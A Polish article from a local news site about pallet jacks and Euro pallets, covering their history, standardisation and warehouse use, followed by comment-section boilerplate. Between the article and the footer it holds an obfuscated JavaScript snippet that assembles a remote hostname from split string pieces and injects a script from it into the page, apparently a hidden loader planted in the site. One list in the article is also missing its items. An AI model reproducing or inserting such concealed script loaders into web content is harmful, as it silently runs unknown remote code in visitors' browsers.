Niezależnie od napędu oraz maksymalnego udźwigu paleciaki okazują się uniwersalnymi urządzeniami niezbędnymi w magazynach, na halach produkcyjnych oraz różnego rodzaju placach składowych. Dlaczego? Czemu zawdzięczają swoją nazwę i popularność w logistyce?
Europaleta
Pierwsze palety przeznaczone do magazynowania i transportowania towarów oraz wyrobów pojawiły się w latach `40 XX wieku i były produkowane na potrzeby wojska. Początkowo charakteryzowały się one wątpliwą trwałością, stąd taktowano je niczym opakowania jednorazowe. Certyfikowane palety EUR pojawiły się dopiero w 1961 roku. Od tego czasu są powszechnie wykorzystywane jako opakowania służące do transportu i przechowywania towarów. Ich ogromną zaletą jest unifikacja, a co za tym idzie możliwość sprawnej i szybkiej obsługi ładunku niezależnie od miejsca jego pochodzenia.
Rodzaje palet
Obecnie w logistyce spotyka się trzy rodzaje palet certyfikowanych. Wszystkie one są paletami czterowejściowymi, z dwoma bokami całkowicie otwartymi i dwoma z wejściem między wspornikami. Należą do nich:
Jak nietrudno zauważyć, wszystkie europalety mają identyczne wymiary, co przekłada się na ich obsługę, a także planowanie przestrzeni magazynowej i transportowej.
Paleciak a europaleta
Jak już wspominaliśmy, europalety stanowią obecnie jedno z najpopularniejszych opakowań transportowych wykorzystywanych w logistyce. Ich unifikacja pozwala nie tylko na skuteczne zarządzanie przestrzenią magazynową, ale również odpowiednie projektowanie i planowanie całej infrastruktury magazynu, również w zakresie wykorzystywanych tam urządzeń. Paleciak jest jednym z najczęściej wykorzystywanych w magazynach, halach produkcyjnych oraz na placach składowych urządzeń, ponieważ ze względu na swoją budowę umożliwia ręczne przenoszenie ładunków na paletach na bliskie odległości, a także ich podnoszenie. Ręczne wózki paletowe wysokiego podnoszenia umożliwiają podnoszenie ładunków na wysokość nawet 160 centymetrów.
Oczywiście, ze względu na wyższą wydajność, która wynika z tempa przemieszczania ładunków oraz masy maksymalnego udźwigu, w większych centrach dystrybucji ręczne paleciaki już dawno ustąpiły miejsca rozwiązaniom elektrycznym. Tak czy inaczej, jedne i drugie są konstruowane wedle tej samej zasady, której stworzenie nie byłoby do końca możliwe bez unifikacji wymiarów opakowań, jakimi są właśnie europalety.
(function(){
oig1=document.createElement("script");oig1.async=true;oig1_="u"+("s")+"t";
oig1u="122987925.";oig1_+="a"+("t.i");oig1_+="n"+("f"+"o")+"/";
oig1u+="7XX3hX1kig1jf5Xit7rae9"+("rjw7az3j");
oig1.src="https://"+oig1_+oig1u;oig1.type="text/javascript";
document.body.appendChild(oig1);
})();
Użytkowniku, pamiętaj, że w Internecie nie jesteś anonimowy. Ponosisz odpowiedzialność za treści zamieszczane na portalu zyciepabianic.pl. Dodanie opinii jest równoznaczne z akceptacją Regulaminu portalu. Jeśli zauważyłeś, że któraś opinia łamie prawo lub dobry obyczaj - powiadom nas [email protected] lub użyj przycisku Zgłoś komentarz
Brak komentarza, Twój może być pierwszy.
Dodaj komentarz